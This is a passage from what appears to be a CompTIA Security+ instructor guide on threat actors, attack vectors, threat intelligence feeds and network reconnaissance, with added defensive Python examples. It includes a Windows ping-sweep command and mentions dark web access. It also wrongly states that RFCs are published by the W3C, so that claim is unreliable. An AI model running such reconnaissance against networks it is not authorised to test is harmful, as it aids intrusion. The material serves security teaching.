such as employees who might harbor grievances or those likely to perpetrate fraud.
An employee who plans and executes a campaign to modify invoices and divert funds
is launching a structured attack; an employee who tries to guess the password on
the salary database a couple of times, having noticed that the file is available on the
network, is perpetrating an opportunistic attack. You must also assess the possibility
that an insider threat may be working in collaboration with an external threat actor
or group.

Insider threats can be categorized as unintentional. An unintentional or inadvertent
insider threat is a vector for an external actor, or a separate malicious internal
actor, to exploit, rather than a threat actor in its own right. Unintentional threats usually
arise from lack of awareness or from carelessness, such as users demonstrating poor
password management. Another example of unintentional insider threat is the concept
of shadow IT, where users purchase or introduce computer hardware or software to
the workplace without the sanction of the IT department and without going through a
procurement and security analysis process. The problem of shadow IT is exacerbated
by the proliferation of cloud services and mobile devices, which are easy for users to
obtain. Shadow IT creates a new unmonitored attack surface for malicious adversaries
to exploit.

Attack Surface and Attack Vectors

The attack surface is all the points at which a malicious threat actor could try to
exploit a vulnerability. To evaluate the attack surface, you need to consider the type
of threat actor. The attack surface for an external actor is (or should be) far smaller
than that for an insider threat. The attack surface can be considered for a network
as a whole, but is also analyzed for individual software applications. Minimizing the
attack surface means restricting access so that only a few known endpoints, protocols/
ports, and services/methods are permitted. Each of these must be assessed for
vulnerabilities.

Show Slide(s): Attack Surface and Attack Vectors

Teaching Tip: Note that developing new attack vectors is one of the capabilities
that distinguishes threat actor groups.

From the point of view of the threat actor, different parts of the attack surface
represent potential attack vectors. An attack vector is the path that a threat actor uses
to gain access to a secure system. In the majority of cases, gaining access means being
able to run malicious code on the target.

• Direct access: this is a type of physical or local attack. The threat actor could exploit
an unlocked workstation, use a boot disk to try to install malicious tools, or steal a
device, for example.

• Removable media: the attacker conceals malware on a thumb drive or
memory card and tries to trick employees into connecting the media to a PC, laptop,
or smartphone. For some exploits, simply connecting the media may be sufficient to
run the malware. In many cases, the attacker may need the employee to open a file
in a vulnerable application or run a setup program.

• Email: the attacker sends a malicious file attachment via email, or via any other
communications system that allows attachments. The attacker needs to use social
engineering techniques to persuade or trick the user into opening the attachment.

• Remote and wireless: the attacker either obtains credentials for a remote access
or wireless connection to the network or cracks the security protocols used for
authentication. Alternatively, the attacker spoofs a trusted resource, such as an
access point, and uses it to perform credential harvesting and then uses the stolen
account details to access the network.

• Supply chain: rather than attack the target directly, a threat actor may seek
ways to infiltrate it via companies in its supply chain. One high-profile example of
this is the Target data breach, which was made via the company's HVAC supplier
(krebsonsecurity.com/…/target-hackers-broke-in-via-hvac-company).

• Web and social media: malware may be concealed in files attached to posts or
presented as downloads. An attacker may also be able to compromise a site so that
it automatically infects vulnerable browser software (a drive-by download). Social
media may also be used more subtly, to reinforce a social engineering campaign
and drive the adoption of Trojans.

• Cloud: many companies now run part or all of their network services via Internet-
accessible clouds. The attacker only needs to find one account, service, or host with
weak credentials to gain access. The attacker is likely to target the accounts used to
develop services in the cloud or manage cloud systems. They may also try to attack
the cloud service provider (CSP) as a way of accessing the victim system.

Sophisticated threat actors will make use of multiple vectors. They are likely to plan a
multi-stage campaign, rather than a single smash and grab type of raid.
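A worked attack-surface review in Python, added here as an example that is not part of the CompTIA guide: it compares a constructed inventory of listening services against a constructed allowlist of approved exposures, separates what an external actor can reach from what an insider can reach, and ranks the unapproved exposures so the Internet-facing ones are reviewed first.

```python
"""Attack-surface review against an allowlist of permitted exposures.

Added example (not from the CompTIA guide). The inventory lines and the
allowlist below are constructed; a real review would draw them from scan
results and change records. It shows the guide's two points: only a few
known endpoints, protocols/ports and services should be permitted, and the
surface reachable by an external actor should be far smaller than the one
an insider can reach.
"""
from dataclasses import dataclass

# Constructed inventory, one listener per line:
# host,proto,port,service,reachable_from ("external" = Internet, "internal" = LAN only)
INVENTORY = """\
web01,tcp,443,https,external
web01,tcp,22,ssh,external
web01,tcp,8080,tomcat-manager,external
db01,tcp,5432,postgresql,internal
db01,tcp,22,ssh,internal
ad01,tcp,389,ldap,internal
ad01,udp,53,dns,internal
fs01,tcp,445,smb,internal
fs01,tcp,3389,rdp,internal
"""

# Constructed allowlist: the (host, proto, port, scope) exposures that were approved.
APPROVED = {
    ("web01", "tcp", 443, "external"),
    ("db01", "tcp", 5432, "internal"),
    ("db01", "tcp", 22, "internal"),
    ("ad01", "tcp", 389, "internal"),
    ("ad01", "udp", 53, "internal"),
    ("fs01", "tcp", 445, "internal"),
}


@dataclass(frozen=True)
class Exposure:
    host: str
    proto: str
    port: int
    service: str
    reachable_from: str   # "external" or "internal"


def parse_inventory(text: str) -> list[Exposure]:
    """Parse the CSV-style inventory, skipping blank and comment lines."""
    exposures = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        host, proto, port, service, scope = [f.strip() for f in line.split(",")]
        exposures.append(Exposure(host, proto, int(port), service, scope))
    return exposures


def attack_surface(exposures: list[Exposure], actor: str) -> list[Exposure]:
    """Surface visible to an actor: outsiders see only external listeners,
    insiders (already on the network) see everything."""
    if actor == "external":
        return [e for e in exposures if e.reachable_from == "external"]
    return list(exposures)


def unapproved(exposures: list[Exposure], approved: set) -> list[Exposure]:
    """Listeners that nobody approved: each one widens the surface without review."""
    return [e for e in exposures
            if (e.host, e.proto, e.port, e.reachable_from) not in approved]


def prioritize(exposures: list[Exposure], approved: set) -> list[tuple[str, Exposure]]:
    """Rank unapproved exposures: Internet-reachable ones first, since every
    external actor shares that surface; internal-only ones second."""
    ranked = [("high" if e.reachable_from == "external" else "medium", e)
              for e in unapproved(exposures, approved)]
    return sorted(ranked, key=lambda item: (item[0] != "high", item[1].host, item[1].port))


if __name__ == "__main__":
    inv = parse_inventory(INVENTORY)
    ext, ins = attack_surface(inv, "external"), attack_surface(inv, "internal")
    print(f"external surface: {len(ext)} listeners; internal surface: {len(ins)} listeners")
    for priority, e in prioritize(inv, APPROVED):
        print(f"[{priority}] {e.host} {e.proto}/{e.port} ({e.service}) "
              f"reachable from {e.reachable_from}: not in allowlist, review or remove")
```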


Review Activity:
Threat Actor Types and Attack Vectors
Answer the following questions:

1. Which of the following would be assessed by likelihood and impact:
vulnerability, threat, or risk?

Risk. To assess likelihood and impact, you must identify both the vulnerability and the
threat posed by a potential exploit.

2. True or false? Nation state actors primarily only pose a risk to other states.

False. Nation state actors have targeted commercial interests for theft, espionage, and
extortion.

3. You receive an email with a screenshot showing a command prompt at one
of your application servers. The email suggests you engage the hacker for
a day's consultancy to patch the vulnerability. How should you categorize
this threat?

This is either gray hat (semi-authorized) hacking or black hat (non-authorized) hacking.
If the request for compensation via consultancy is an extortion threat (if refused, the
hacker sells the exploit on the dark web), then the motivation is purely financial gain
and can be categorized as black hat. If the consultancy is refused and the hacker takes
no further action, it can be classed as gray hat.

4. Which type of threat actor is primarily motivated by the desire for
social change?

Hacktivist.

5. Which three types of threat actor are most likely to have high levels
of funding?

State actors, criminal syndicates, and competitors.

6. You are assisting with writing an attack surface assessment report for a
small company. Following the CompTIA syllabus, which two potential attack
vectors have been omitted from the following headings in the report? Direct
access, Email, Remote and wireless, Web and social media, Cloud.

Removable media and supply chain.


Topic 2B
Explain Threat Intelligence Sources

EXAM OBJECTIVES COVERED
1.5 Explain different threat actors, vectors, and intelligence sources

As a security professional, you must continually refresh and expand your knowledge of
both security technologies and practices and adversary tactics and techniques. As well
as staying up to date on a personal level, you will also need to select and deploy threat
intelligence platforms. You need to be able to identify and evaluate sources of threat
intelligence and research and to use these resources to enhance security controls.

Teaching Tip: Use of threat intelligence sources is a new area of focus for the exam, and
will be a critical tool throughout the candidates' careers. This topic covers the remaining
content examples for objective 1.5.

Threat Research Sources

Show Slide(s): Threat Research Sources

Threat research is a counterintelligence gathering effort in which security companies
and researchers attempt to discover the tactics, techniques, and procedures (TTPs)
of modern cyber adversaries. There are many companies and academic institutions
engaged in primary cybersecurity research. Security solution providers with firewall
and anti-malware platforms derive a lot of data from their own customers' networks.
As they assist customers with cybersecurity operations, they are able to analyze and
publicize TTPs and their indicators. These organizations also operate honeynets to try
to observe how hackers interact with vulnerable systems.

Teaching Tip: Give an overview of the purpose of threat intelligence, introducing the
term TTP. Explain which companies and institutions are active in this type of research.
Make sure students know how to access dark web sites and the difficulty of performing
research.

Another primary source of threat intelligence is the dark web. The deep web is any
part of the World Wide Web that is not indexed by a search engine. This includes pages
that require registration, pages that block search indexing, unlinked pages, pages using
non-standard DNS, and content encoded in a non-standard manner. Within the deep
web, are areas that are deliberately concealed from regular browser access.

• Dark net—a network established as an overlay to Internet infrastructure by
software, such as The Onion Router (TOR), Freenet, or I2P, that acts to anonymize
usage and prevent a third party from knowing about the existence of the network
or analyzing any activity taking place over the network. Onion routing, for instance,
uses multiple layers of encryption and relays between nodes to achieve this
anonymity.

• Dark web—sites, content, and services accessible only over a dark net. While there
are dark web search engines, many sites are hidden from them. Access to a dark
web site via its URL is often only available via word of mouth bulletin boards.


Using the TOR browser to view the AlphaBay market, now closed by law enforcement.
(Screenshot used with permission from Security Onion.)

Investigating these dark web sites and message boards is a valuable source of
counterintelligence. The anonymity of dark web services has made it easy for
investigators to infiltrate the forums and webstores that have been set up to exchange
stolen data and hacking tools. As adversaries react to this, they are setting up new
networks and ways of identifying law enforcement infiltration. Consequently, dark nets
and the dark web represent a continually shifting landscape.

Threat Intelligence Providers

Show Slide(s): Threat Intelligence Providers

The outputs from the primary research undertaken by security solutions providers and
academics can take three main forms:

• Behavioral threat research—narrative commentary describing examples of attacks
and TTPs gathered through primary research sources.

• Reputational threat intelligence—lists of IP addresses and domains associated
with malicious behavior, plus signatures of known file-based malware.

• Threat data—computer data that can correlate events observed on a customer's
own networks and logs with known TTP and threat actor indicators.

Teaching Tip: Note the ways in which threat intelligence can be consumed. Explain that
the market is a mixture of platform providers with proprietary feeds, commercial platform
providers with open-source feeds, open-source platforms and feeds, and open-source
feeds with no associated platform.

Threat data can be packaged as feeds that integrate with a security information and
event management (SIEM) platform. These feeds are usually described as cyber
threat intelligence (CTI) data. The data on its own is not a complete security solution
however. To produce actionable intelligence, the threat data must be correlated with
observed data from customer networks. This type of analysis is often powered by
artificial intelligence (AI) features of the SIEM.

Threat intelligence platforms and feeds are supplied as one of three different
commercial models:

• Closed/proprietary—the threat research and CTI data is made available as a paid
subscription to a commercial threat intelligence platform. The security solution
provider will also make the most valuable research available early to platform
subscribers in the form of blogs, white papers, and webinars. Some examples of
such platforms include:

  • IBM X-Force Exchange (exchange.xforce.ibmcloud.com)

  • FireEye (fireeye.com/solutions/cyber-threat-intelligence/threat-intelligence-subscriptions.html)

  • Recorded Future (recordedfuture.com/solutions/threat-intelligence-feeds)

IBM X-Force Exchange threat intelligence portal. (Image copyright 201 IBM Security
exchange.xforce.ibmcloud.com.)

• Vendor websites—proprietary threat intelligence is not always provided at cost. All
types of security, hardware, and software vendors make huge amounts of threat
research available via their websites as a general benefit to their customers. One
example is Microsoft's Security Intelligence blog
(microsoft.com/security/blog/microsoft-security-intelligence).

• Public/private information sharing centers—in many critical industries, Information
Sharing and Analysis Centers (ISACs) have been set up to share threat intelligence
and promote best practice (nationalisacs.org/member-isacs). These are
sector-specific resources for companies and agencies working in critical industries,
such as power supply, financial markets, or aviation. Where there is no coverage by
an ISAC, local industry groups and associations may come together to provide
mutual support.

• Open source intelligence (OSINT)—some companies operate threat intelligence
services on an open-source basis, earning income from consultancy rather than
directly from the platform or research effort. Some examples include:

  • AT&T Security, previously AlienVault Open Threat Exchange (OTX)
  (otx.alienvault.com)

  • Malware Information Sharing Project (MISP) (misp-project.org/feeds)

  • Spamhaus (spamhaus.org/organization)

  • VirusTotal (virustotal.com)

As well as referring to open-source threat research providers, OSINT can mean any
intelligence derived from publicly available information. OSINT is a common reconnaissance
technique where the attacker harvests domains, IP address ranges, employees, and other
data that will assist in identifying attack vectors. Companies should also monitor public
networks for signs of attack planning (chatter on forums) and breaches (confidential
information or account credentials posted to online forums). Most commercial providers
offer monitoring services, which can include dark web sources
(fireeye.com/content/dam/fireeye-www/products/pdfs/pf/intel/ds-digital-threat-monitoring.pdf).

Other Threat Intelligence Research Sources

Show Slide(s): Other Threat Intelligence Research Sources

There are plenty of other sources of best practice advice and new research other than
the threat intelligence platforms:

• Academic journals—results from academic researchers and not-for-profit trade
bodies and associations, such as the IEEE, are published as papers in journals.
Access to these papers is usually subscription based. One free source is the arXiv
preprint repository (arxiv.org/list/cs.CR/recent). Preprints are papers that have not
been published or peer reviewed.

• Conferences—security conferences are hosted and sponsored by various
institutions and provide an opportunity for presentations on the latest threats and
technologies.

• Request for Comments (RFC)—when a new technology is accepted as a web
standard, it is published as an RFC by the W3C (rfc-editor.org). There are also
informational RFCs covering many security considerations and best practices.

• Social media—companies and individual researchers and practitioners write
informative blogs or social media feeds. There are too many useful blog and
discussion sources to include here, but the list curated by Digital Guardian
(digitalguardian.com/blog/top-infosec-blogs-you-should-be-reading) is a good
starting point.

Teaching Tip: You should not need to spend too long on this; just make students aware of
these sources.

As well as a source of information, social media should also be monitored for threat data
(trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/hunting-threats-on-twitter).

Tactics, Techniques, and Procedures and Indicators of Compromise

Show Slide(s): Tactics, Techniques, and Procedures and Indicators of Compromise

A tactic, technique, or procedure (TTP) is a generalized statement of adversary
behavior. The term is derived from military doctrine (mwi.usma.edu/what-is-army-doctrine).
TTPs categorize behaviors in terms of campaign strategy and approach
(tactics), generalized attack vectors (techniques), and specific intrusion tools and
methods (procedures).

An indicator of compromise (IoC) is a residual sign that an asset or network has
been successfully attacked or is continuing to be attacked. Put another way, an IoC is
evidence of a TTP.

Teaching Tip: Make sure students can use this terminology.

TTPs describe what and how an adversary acts and Indicators describe how to recognize
what those actions might look like. (stixproject.github.io/documentation/concepts/ttp-vs-indicator)

As there are many different targets and vectors of an attack, so too are there many
different potential IoCs. The following is a list of some IoCs that you may encounter:

• Unauthorized software and files

• Suspicious emails

• Suspicious registry and file system changes

• Unknown port and protocol usage

• Excessive bandwidth usage

• Rogue hardware

• Service disruption and defacement

• Suspicious or unauthorized account usage

An IoC can be definite and objectively identifiable, like a malware signature, but often
IoCs can only be described with confidence via the correlation of many data points.
Because these IoCs are often identified through patterns of anomalous activity rather
than single events, they can be open to interpretation and therefore slow to diagnose.
Consequently, threat intelligence platforms use AI-backed analysis to speed up
detection without overwhelming analysts' time with false positives.

Strictly speaking, an IoC is evidence of an attack that was successful. The term indicator of
attack (IoA) is sometimes also used for evidence of an intrusion attempt in progress.

Threat Data Feeds

Show Slide(s): Threat Data Feeds

When you use a cyber threat intelligence (CTI) platform, you subscribe to a threat data
feed. The information in the threat data can be combined with event data from your
own network and system logs. An analysis platform performs correlation to detect
whether any IoCs are present. There are various ways that a threat data feed can be
implemented.

Teaching Tip: Make sure students can distinguish STIX and TAXII. Note that we'll cover
vulnerability assessment in the next lesson.

Interaction Opportunity: You can show some other threat map examples, such as Check
Point's (threatmap.checkpoint.com). Kaspersky's is visually impressive too
(cybermap.kaspersky.com).

Structured Threat Information eXpression (STIX)

The OASIS CTI framework (oasis-open.github.io/cti-documentation) is designed to
provide a format for this type of automated feed so that organizations can share CTI.
The Structured Threat Information eXpression (STIX) part of the framework describes
standard terminology for IoCs and ways of indicating relationships between them.

STIX Relationship example. (Icon images Copyright 2016 Bret Jordan. Licensed under the Creative
Commons Attribution-ShareAlike (CC BY-SA) License, Version 4.0. (freetaxii.github.io/stix2-icons.html.)

Where STIX provides the syntax for describing CTI, the Trusted Automated eXchange
of Indicator Information (TAXII) protocol provides a means for transmitting CTI data
between servers and clients. For example, a CTI service provider would maintain a
repository of CTI data. Subscribers to the service obtain updates to the data to load
into analysis tools over TAXII. This data can be requested by the client (referred to as a
collection), or the data can be pushed to subscribers (referred to as a channel).
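An added example (written for this edit, not code from the CompTIA guide or from OASIS) that shows what the feed-to-log correlation described under Threat Data Feeds looks like in practice using the STIX format just introduced: it builds a minimal STIX 2.1 bundle with the Python standard library only, then matches its indicators against constructed log lines. The threat actor name, the addresses and domain (documentation ranges), the log lines, and the single-comparison pattern shape it supports are all assumptions.

```python
"""Added example (not from the CompTIA guide): build a minimal STIX 2.1 bundle
and correlate its indicators against constructed log events, the way an
analysis platform matches a threat data feed against a customer's own logs."""
import json
import re
import uuid
from datetime import datetime, timezone


def _now() -> str:
    # STIX 2.1 timestamps are RFC 3339 in UTC; millisecond precision is conventional.
    return datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")


def stix_object(obj_type: str, **props) -> dict:
    """Common properties shared by every STIX 2.1 Domain/Relationship Object."""
    return {"type": obj_type, "spec_version": "2.1",
            "id": f"{obj_type}--{uuid.uuid4()}",
            "created": _now(), "modified": _now(), **props}


def build_feed() -> dict:
    """Constructed CTI feed: one threat actor, two indicators (an IPv4 address and a
    domain, both from documentation ranges) and the 'indicates' relationships."""
    actor = stix_object("threat-actor", name="Example Hacktivist Group",
                        threat_actor_types=["hacktivist"])
    ip_ind = stix_object("indicator", name="Known C2 address",
                         pattern="[ipv4-addr:value = '203.0.113.77']",
                         pattern_type="stix", valid_from=_now())
    dom_ind = stix_object("indicator", name="Known phishing domain",
                          pattern="[domain-name:value = 'login-update.example']",
                          pattern_type="stix", valid_from=_now())
    rels = [stix_object("relationship", relationship_type="indicates",
                        source_ref=i["id"], target_ref=actor["id"])
            for i in (ip_ind, dom_ind)]
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}",
            "objects": [actor, ip_ind, dom_ind, *rels]}


# Only the simplest STIX pattern shape is handled here: [<type>:<prop> = '<value>']
_PATTERN = re.compile(r"^\[([\w-]+):([\w.]+)\s*=\s*'([^']*)'\]$")


def parse_pattern(pattern: str) -> tuple[str, str, str]:
    m = _PATTERN.match(pattern.strip())
    if not m:
        raise ValueError(f"unsupported STIX pattern: {pattern}")
    return m.group(1), m.group(2), m.group(3)


def observables_from_log(line: str) -> dict[str, set[str]]:
    """Turn one constructed firewall/DNS log line into STIX cyber-observable values."""
    obs = {"ipv4-addr:value": set(), "domain-name:value": set()}
    obs["ipv4-addr:value"].update(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", line))
    m = re.search(r"query=([\w.-]+)", line)
    if m:
        obs["domain-name:value"].add(m.group(1))
    return obs


def correlate(bundle: dict, log_lines: list[str]) -> list[dict]:
    """Return one hit per (indicator, log line) match, with the attributed actor(s)."""
    objs = {o["id"]: o for o in bundle["objects"]}
    # Follow 'indicates' relationships from each indicator to its threat actor.
    attributed: dict[str, list[str]] = {}
    for o in objs.values():
        if o["type"] == "relationship" and o["relationship_type"] == "indicates":
            attributed.setdefault(o["source_ref"], []).append(objs[o["target_ref"]]["name"])
    hits = []
    for o in objs.values():
        if o["type"] != "indicator":
            continue
        otype, prop, value = parse_pattern(o["pattern"])
        key = f"{otype}:{prop}"
        for n, line in enumerate(log_lines, 1):
            if value in observables_from_log(line).get(key, set()):
                hits.append({"line": n, "indicator": o["name"],
                             "actor": attributed.get(o["id"], [])})
    return hits


# Constructed log lines: lines 1 and 3 should match, lines 2 and 4 are benign.
SAMPLE_LOGS = [
    "2021-08-30T10:00:01Z fw ALLOW src=10.1.0.23 dst=203.0.113.77 dport=443",
    "2021-08-30T10:00:02Z fw ALLOW src=10.1.0.23 dst=198.51.100.10 dport=443",
    "2021-08-30T10:00:03Z dns client=10.1.0.44 query=login-update.example",
    "2021-08-30T10:00:04Z dns client=10.1.0.44 query=www.example.com",
]

if __name__ == "__main__":
    feed = build_feed()
    print(json.dumps(feed, indent=2)[:400], "...")
    for hit in correlate(feed, SAMPLE_LOGS):
        print(hit)
```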

Automated Indicator Sharing (AIS)

Automated Indicator Sharing (AIS) is a service offered by the Department of
Homeland Security (DHS) for companies to participate in threat intelligence sharing
(us-cert.gov/ais). It is especially aimed at ISACs, but private companies can join too. AIS
is based on the STIX and TAXII standards and protocols.

Threat Maps
A threat map is an animated graphic showing the source, target, and type of attacks
that have been detected by a CTI platform. The security solutions providers publish
such maps showing global attacks on their customers' systems
(fortinet.com/fortiguard/threat-intelligence/threat-map).

File/Code Repositories
A file/code repository such as virustotal.com holds signatures of known malware code.
The code samples derive from live customer systems and (for public repositories) files
that have been uploaded by subscribers.

Vulnerability Databases and Vulnerability Feeds

As well as analyzing adversary tools and behaviors, another source of threat
intelligence is identifying vulnerabilities in OS, software application, and firmware
code. Security researchers look for vulnerabilities, often for the reward of bug bounties
offered by the vendor. Lists of vulnerabilities are stored in databases such as Common
Vulnerabilities and Exposures (CVE), operated by Mitre (cve.mitre.org). Information
about vulnerabilities is codified as signatures and scanning scripts that can be supplied
as feeds to automated vulnerability scanning software.


Artificial Intelligence and Predictive Analysis

Show Slide(s): Artificial Intelligence and Predictive Analysis

A threat data feed does not produce threat intelligence automatically. The combination
of security intelligence and CTI data can be processed, correlated, and analyzed to
provide actionable insights that will assist you in identifying security problems. For
example, security intelligence reveals that DDoS attacks were perpetrated against your
web services from a range of IP addresses by collecting log and network traffic data.
Threat intelligence associates those IP addresses with a hacktivist group. By linking
the two sources of intelligence, you can identify goals and tactics associated with that
group and use controls to mitigate further attacks. Most threat intelligence platforms
use some sort of artificial intelligence (AI) to perform correlation analysis.

Teaching Tip: Note that security tools are increasingly making use of AI and ML techniques.
We will be referring to these again when looking at SIEM and SOAR analytics and incident
response.

AI and Machine Learning

AI is the science of creating machine systems that can simulate or demonstrate a
similar general intelligence capability to humans. Early types of AI (expert systems)
use if-then rules to draw inferences from a limited data set, called a knowledge base.
Machine learning (ML) uses algorithms to parse input data and then develop
strategies for using that data, such as identifying an object as a type, working out the
best next move in a game, and so on. Unlike an expert system, machine learning can
modify the algorithms it uses to parse data and develop strategies. It can make gradual
improvements in the decision-making processes. The structure that facilitates this
learning process is referred to as an artificial neural network (ANN). Nodes in a neural
network take inputs and then derive outputs, using complex feedback loops between
nodes. An ML system has objectives and error states and it adjusts its neural network
to reduce errors and optimize objectives.

In terms of threat intelligence, this AI-backed analysis might perform accurate
correlations that would take tens or hundreds of hours of analyst time if the data were
to be examined manually.

Predictive Analysis

Identifying the signs of a past attack or the presence of live attack tools on a network
quickly is valuable. However, one of the goals of using AI-backed threat intelligence is
to perform predictive analysis, or threat forecasting. This means that the system can
anticipate a particular type of attack and possibly the identity of the threat actor before
the attack is fully realized. For example, the system tags references to a company,
related IP addresses, and account names across a range of ingested data from dark
web sources, web searches, social media posts, phishing email attempts, and so on.
The analysis engine associates this chatter with IP addresses that it can correlate with
a known adversary group. This gives the target advance warning that an attack is in the
planning stages and more time to prepare an effective defense.

Such concrete threat forecasting is not a proven capability of any commercial threat
intelligence platform at the time of writing. However, predictive analysis can inform risk
assessment by giving more accurate, quantified measurements of the likelihood and
impact (cost) of breach-type events.


Review Activity:
Threat Intelligence Sources
Answer the following questions:

1. You are consulting on threat intelligence solutions for a supplier of
electronic voting machines. What type of threat intelligence source would
produce the most relevant information at the lowest cost?

For critical infrastructure providers, threat data sharing via an Information Sharing and
Analysis Center (ISAC) is likely to be the best option.

2. Your CEO wants to know if the company's threat intelligence platform
makes effective use of OSINT. What is OSINT?

Open-source intelligence (OSINT) is cybersecurity-relevant information harvested from
public websites and data records. In terms of threat intelligence specifically, it refers to
research and data feeds that are made publicly available.

3. You are assessing whether to join AIS. What is AIS and what protocol should
your SIEM support in order to connect to AIS servers?

Automated Indicator Sharing (AIS) is a service offered by the Department of Homeland
Security (DHS) for participating in threat intelligence sharing. AIS uses the Trusted
Automated eXchange of Indicator Information (TAXII) protocol as a means of
transmitting CTI data between servers and clients.


Lesson 2
Summary

You should be able to explain how to assess external and insider threat actor types
in terms of intent and capability. You should also be able to summarize options for
implementing threat intelligence platforms and data sources.

Teaching Tip: Check that students are confident about the content that has been covered.
If there is time, re-visit any content examples that they have questions about. If you have
used all the available time for this lesson block, note the issues, and schedule time for a
review later in the course.

Guidelines for Explaining Threat Actors and
Threat Intelligence

Follow these guidelines when you assess the use of threat research and analysis:

• Create a profile of threat actor types that pose the most likely threats to your
business. Remember that you may be targeted as the supplier to a larger enterprise.

• Identify sources of threat research, especially those that are directly relevant to your
industry sector. Schedule time to keep up to date with threat trends and security
best practices.

• Evaluate the use of a threat intelligence platform, considering proprietary versus
open-source options.

• Evaluate the use of different proprietary and open-source threat data feeds,
considering that sector-specific data might be of most use.

Interaction Opportunity: Optionally, discuss with students how threat intelligence
platforms and data feeds could be used within their own workplaces, or how these
resources have already been implemented, and how successful they have proved.

Lesson 3
Performing Security Assessments

LESSON INTRODUCTION

Security assessment refers to processes and tools that evaluate the attack surface.
With knowledge of adversary tactics and capabilities, you can assess whether points on
the attack surface are potentially vulnerable attack vectors. The output of assessment
is recommendations for deploying, enhancing, or reconfiguring security controls to
mitigate the risk that vulnerabilities are exploitable by threat actors.

Teaching Tip: This lesson continues on the assessment theme by looking at specific tools,
vulnerability assessment, and penetration testing.

Lesson Objectives
In this lesson, you will:
• Assess organizational security with network reconnaissance tools.

• Explain security concerns with general vulnerability types.

• Summarize vulnerability scanning techniques.

• Explain penetration testing concepts.


Topic 3A
Assess Organizational Security with
Network Reconnaissance Tools

EXAM OBJECTIVES COVERED
4.1 Given a scenario, use the appropriate tool to assess organizational security

Teaching Tip: This topic covers the network reconnaissance and packet capture sections
of objective 4.1. Other content examples from this objective are discussed elsewhere in
the course. There are a lot of tools to get through, but hopefully many of them will be
familiar to students with Network+ experience. Note the relevance of each tool to
security assessment.

Reconnaissance is a type of assessment activity that maps the potential attack surface
by identifying the nodes and connections that make up the network. You will often
need to run scans using both command-line and GUI topology discovery tools. You
will need to report host configurations using fingerprinting tools and capture and
analyze network traffic. You should also understand how tools can be used to operate
backdoor connections to a host and to covertly exfiltrate data.

ipconfig, ping, and arp

Show Slide(s): ipconfig, ping, and arp

The process of mapping out the attack surface is referred to as network
reconnaissance and discovery. Reconnaissance techniques are used by threat
actors, but they are also used by security professionals to probe and test their own
security systems, as part of a security assessment and ongoing monitoring.

Topology discovery (or "footprinting") means scanning for hosts, IP ranges, and routes
between networks to map out the structure of the target network. Topology discovery
can also be used to build an asset database and to identify non-authorized hosts
(rogue system detection) or network configuration errors.

Basic topology discovery tasks can be accomplished using the command-line tools
built into Windows and Linux. The following tools report the IP configuration and test
connectivity on the local network segment or subnet.

Teaching Tip: Focus on uses rather than switches. Encourage students to learn syntax and
options through practice. If students are not confident with networking fundamentals,
you might want to skip this section and come back to it after lesson 9.

• ipconfig—show the configuration assigned to network interface(s) in Windows,
including the hardware or media access control (MAC) address, IPv4 and IPv6
addresses, default gateway, and whether the address is static or assigned by DHCP.
If the address is DHCP-assigned, the output also shows the address of the DHCP
server that provided the lease.

• ifconfig—show the configuration assigned to network interface(s) in Linux.

• ping—probe a host on a particular IP address or host name using Internet Control
Message Protocol (ICMP). You can use ping with a simple script to perform
a sweep of all the IP addresses in a subnet. The following example will scan the
10.1.0.0/24 subnet from a Windows machine:

for /l %i in (1,1,255) do @ping -n 1 -w 100 10.1.0.%i | find /i "reply"

Lesson 3: Performing Security Assessments | Topic 3A


Performing a ping sweep in Windows with a for loop. Searching multiple octets requires nested loops.
Note that not all hosts respond to ICMP probes. (Screenshot used with permission from Microsoft.)

• arp—display the local machine's Address Resolution Protocol (ARP) cache.
The ARP cache shows the MAC address of the interface associated with each IP
address the local host has communicated with recently. This can be useful if you
are investigating a suspected spoofing attack. For example, a sign of a
man-in-the-middle attack is where the MAC address of the default gateway IP listed
in the cache is not the legitimate router's MAC address.

For more information about commands, including syntax usage, look up the command in
an online resource for Windows
(docs.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands)
or Linux (linux.die.net/man).
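As an added example (not from the guide), the following Python applies the gateway check described above to a captured ARP cache, handling both Windows arp -a and Linux arp -n output formats and, going one step further than the text, reporting which other cached IP address shares the suspect MAC. The sample outputs, the gateway address 10.1.0.254 and the router MAC are constructed.

```python
"""Added example (not from the CompTIA guide): compare the default gateway's entry
in a captured ARP cache against its known-good MAC address, the man-in-the-middle
sign described in the text. Parses both Windows 'arp -a' and Linux 'arp -n' output."""
import re

# One regex for both formats: an IPv4 address followed later on the same line by a
# MAC written with ':' (Linux) or '-' (Windows) separators.
_ENTRY = re.compile(
    r"(?P<ip>(?:\d{1,3}\.){3}\d{1,3})\s+.*?"
    r"(?P<mac>(?:[0-9a-fA-F]{2}[:-]){5}[0-9a-fA-F]{2})")


def normalize_mac(mac: str) -> str:
    """Canonical lower-case, colon-separated form so the two OS formats compare equal."""
    return mac.lower().replace("-", ":")


def parse_arp_cache(text: str) -> dict[str, str]:
    """Return {ip: mac} for every cache entry in Windows or Linux arp output."""
    cache = {}
    for line in text.splitlines():
        m = _ENTRY.search(line)
        if m:
            cache[m.group("ip")] = normalize_mac(m.group("mac"))
    return cache


def check_gateway(text: str, gateway_ip: str, expected_mac: str) -> dict:
    """Verdict on the gateway entry: 'ok', 'alert' (MAC differs from baseline) or
    'unknown' (the host has not talked to the gateway yet, so no entry exists)."""
    cache = parse_arp_cache(text)
    seen = cache.get(gateway_ip)
    if seen is None:
        return {"status": "unknown", "reason": "gateway not in ARP cache yet"}
    if seen != normalize_mac(expected_mac):
        # Another host has answered ARP for the gateway address; list the IP(s)
        # that legitimately carry the MAC now claiming to be the gateway.
        others = sorted(ip for ip, mac in cache.items()
                        if mac == seen and ip != gateway_ip)
        return {"status": "alert", "gateway_mac": seen,
                "other_ips_with_same_mac": others}
    return {"status": "ok", "gateway_mac": seen}


# Constructed Windows 'arp -a' output: the gateway 10.1.0.254 is answered by the MAC
# that belongs to 10.1.0.99, not by the router's baseline MAC.
WINDOWS_SUSPICIOUS = """\
Interface: 10.1.0.23 --- 0xb
  Internet Address      Physical Address      Type
  10.1.0.99             00-0c-29-12-34-56     dynamic
  10.1.0.254            00-0c-29-12-34-56     dynamic
  10.1.0.255            ff-ff-ff-ff-ff-ff     static
"""

# Constructed Linux 'arp -n' output with the legitimate gateway MAC.
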